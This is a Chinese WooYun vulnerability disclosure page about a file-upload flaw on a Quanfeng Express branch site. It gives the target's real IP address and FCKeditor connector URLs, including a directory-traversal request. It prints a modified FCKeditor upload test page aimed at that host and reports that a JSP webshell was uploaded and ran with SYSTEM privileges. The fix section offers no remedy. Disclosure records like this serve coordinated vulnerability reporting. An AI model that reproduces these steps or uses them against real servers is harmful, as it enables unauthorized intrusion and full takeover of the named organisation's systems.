当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103604

漏洞标题:全峰快递某分站上传漏洞

相关厂商:全峰快递

漏洞作者: j2ck3r

提交时间:2015-03-25 11:59

修复时间:2015-05-14 08:40

公开时间:2015-05-14 08:40

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

全峰快递某分站上传漏洞

详细说明:

全峰快递某分站上传漏洞

漏洞证明:

http://122.225.104.50:8080/templates/index/hrlogon.jsp

1.jpg


扫描目录发现有FCKeditor
http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

2.jpg


目录可以任意遍历
http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../

3.jpg


本地构造上传文件

<!--
* FCKeditor - The text editor for internet
* Copyright (C) 2003-2006 Frederico Caldeira Knabben
*
* Licensed under the terms of the GNU Lesser General Public License:
* http://www.opensource.org/licenses/lgpl-license.php
*
* For further information visit:
* http://www.fckeditor.net/
*
* "Support Open Source software. What about a donation today?"
*
* File Name: test.html
* Test page for the File Browser connectors.
*
* File Authors:
* Frederico Caldeira Knabben (fredck@fckeditor.net)
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FCKeditor - Connectors Tests</title>
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" />
<script type="text/javascript">
function BuildBaseUrl( command )
{
var sUrl =
document.getElementById('cmbConnector').value +
'?Command=' + command +
'&Type=' + document.getElementById('cmbType').value +
'&CurrentFolder=' + document.getElementById('txtFolder').value ;

return sUrl ;
}
function SetFrameUrl( url )
{
if ( document.all )
eRunningFrame.document.location = url ;
else
document.getElementById('eRunningFrame').src = url ;

document.getElementById('eUrl').innerHTML = url ;
}
function GetFolders()
{
SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
return false ;
}
function GetFoldersAndFiles()
{
SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
return false ;
}
function CreateFolder()
{
var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

if ( ! sFolder )
return ;

var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
sUrl += '&NewFolderName=' + escape( sFolder ) ;
SetFrameUrl( sUrl ) ;
return false ;
}
function OnUploadCompleted( errorNumber, fileName )
{
switch ( errorNumber )
{
case 0 :
alert( 'File uploaded with no errors' ) ;
break ;
case 201 :
GetFoldersAndFiles()
alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
break ;
case 202 :
alert( 'Invalid file' ) ;
break ;
default :
alert( 'Error on file upload. Error number: ' + errorNumber ) ;
break ;
}
}
this.frames.frmUpload = this ;
function SetAction()
{
var sUrl = BuildBaseUrl( 'FileUpload' ) ;
document.getElementById('eUrl').innerHTML = sUrl ;
document.getElementById('frmUpload').action = sUrl ;
}
</script>
</head>
<body>
<table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
<tr>
<td>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
Connector:<br />
<select id="cmbConnector" name="cmbConnector">
<option value="asp/connector.asp" selected="selected">ASP</option>
<option value="http://122.225.104.50:8080/fckeditor//editor/filemanager/browser/default/connectors/jsp/connector">ASP.Net</option>
<option value="cfm/connector.cfm">ColdFusion</option>
<option value="lasso/connector.lasso">Lasso</option>
<option value="perl/connector.cgi">Perl</option>
<option value="php/connector.php">PHP</option>
<option value="py/connector.py">Python</option>
</select>
</td>
<td>
&nbsp;&nbsp;&nbsp;</td>
<td>
Current Folder<br />
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
<td>
&nbsp;&nbsp;&nbsp;</td>
<td>
Resource Type<br />
<select id="cmbType" name="cmbType">
<option value="File" selected="selected">File</option>
<option value="Image">Image</option>
<option value="Flash">Flash</option>
<option value="Media">Media</option>
<option value="Invalid">Invalid Type (for testing)</option>
</select>
</td>
</tr>
</table>
<br />
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td valign="top">
<a href="#" onclick="GetFolders();">Get Folders</a></td>
<td>
&nbsp;&nbsp;&nbsp;</td>
<td valign="top">
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
<td>
&nbsp;&nbsp;&nbsp;</td>
<td valign="top">
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
<td>
&nbsp;&nbsp;&nbsp;</td>
<td valign="top">
<form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" onclick="SetAction();" />
</form>
</td>
</tr>
</table>
<br />
URL: <span id="eUrl"></span>
</td>
</tr>
<tr>
<td height="100%" valign="top">
<iframe id="eRunningFrame" src="../../../../fckblank.html" name="eRunningFrame" width="100%"
height="100%"></iframe>
</td>
</tr>
</table>
</body>
</html>


4.jpg


上传JSP木马成功

5.jpg


WIN2003系统 直接就是SYSTEM的权限

修复方案:

你们懂得~~

版权声明:转载请注明来源 j2ck3r@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-30 08:39

厂商回复:

CNVD确认并复现所述情况,,由CNVD按以往尝试的公开渠道向网站管理单位通报.

最新状态:

暂无


漏洞评价:

评论